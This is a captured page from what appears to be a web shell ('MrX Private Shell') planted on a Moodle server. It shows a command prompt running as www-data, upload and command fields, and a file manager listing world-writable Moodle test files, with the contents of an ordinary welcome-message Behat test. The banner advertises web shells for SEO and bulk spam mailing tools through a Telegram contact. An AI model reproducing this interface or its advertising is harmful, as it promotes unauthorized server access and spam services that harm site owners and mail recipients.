__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.10: ~ $
@core @core_my
Feature: Welcome message
  In order to welcome new or existing user
  As a user
  I will see welcome message when I log into moodle

  Scenario: Log in and being redirected to course page
    Given the following "users" exist:
      | username | password | firstname | lastname | email            |
      | wf       | test     | Fei       | Wang     | fei@example.com  |
    And the following "courses" exist:
      | fullname | shortname |
      | Math 101 | M1O1      |
    When I am on "Math 101" course homepage
    And I should see "You are not logged in" in the "page-footer" "region"
    And I set the field "Username" to "wf"
    And I set the field "Password" to "test"
    And I press "Log in"
    And I should see "Math 101" in the "page-header" "region"
    And I should not see "Welcome, Fei!" in the "page-header" "region"
    And I follow "Dashboard"
    Then I should see "Welcome, Fei!" in the "page-header" "region"

  @javascript
  Scenario: Log in and being redirected to default home page
    When I log in as "admin"
    And I should see "You are logged in as Admin User" in the "page-footer" "region"
    And I should see "Welcome, Admin!" in the "page-header" "region"
    And I log out
    And I should see "You are not logged in" in the "page-footer" "region"
    And I log in as "admin"
    Then I should see "Hi, Admin!" in the "page-header" "region"

  @accessibility @javascript
  Scenario Outline: The start page must meet accessibility standards when the welcome message is displayed
    Given the following config values are set as admin:
      | defaulthomepage | <defaulthomepage> |
    When I log in as "admin"
    Then I should see "Welcome, Admin!" in the "page-header" "region"
    And the page should meet accessibility standards

    Examples:
      | defaulthomepage |
      # Home.
      | 0               |
      # Dashboard.
      | 1               |
      # My courses.
      | 2               |

Filemanager

Name Type Size Permission Actions
add_blocks.feature File 1.03 KB 0777
my_courses.feature File 13.34 KB 0777
preferences_navigation.feature File 4.95 KB 0777
reset_all_pages.feature File 3.93 KB 0777
reset_page.feature File 1.08 KB 0777
restrict_available_blocks.feature File 1.61 KB 0777
welcome.feature File 1.91 KB 0777
Filemanager